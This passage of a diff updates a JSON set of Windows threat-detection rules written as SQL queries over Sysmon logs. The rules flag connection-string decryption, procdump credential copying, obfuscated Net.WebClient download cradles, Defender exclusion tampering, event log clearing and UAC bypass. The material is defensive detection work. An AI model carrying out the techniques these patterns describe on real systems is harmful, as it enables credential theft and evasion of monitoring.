"proc_creation_win_sysinternals_psservice.yml" + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" }, { - "title": "Defrag Deactivation", - "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "title": "Audio Capture via SoundRecorder", + "id": "83865853-59aa-449e-9600-74b9d89a6d6e", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detect attacker collecting audio via SoundRecorder application.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_slingshot.yml" + "filename": "proc_creation_win_soundrecorder_audio_capture.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Imports Registry Key From a File", + "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "status": "test", + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate import of keys", + "Evernote" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_regedit_import_keys.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "status": "experimental", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "status": "experimental", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Potential Defense Evasion Via Binary Rename", - "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", + "description": "Detects a suspicious RDP session redirect using tscon.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Potential Windows Defender Tampering Via Wmic.EXE", + "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious VBoxDrvInst.exe Parameters", - "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "status": "test", - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Recon Information for Export with Command Prompt", + "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "status": "experimental", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tree.com' ESCAPE '\\' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\doskey.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" + "filename": "proc_creation_win_susp_recon.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", - "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", + "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "status": "experimental", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX 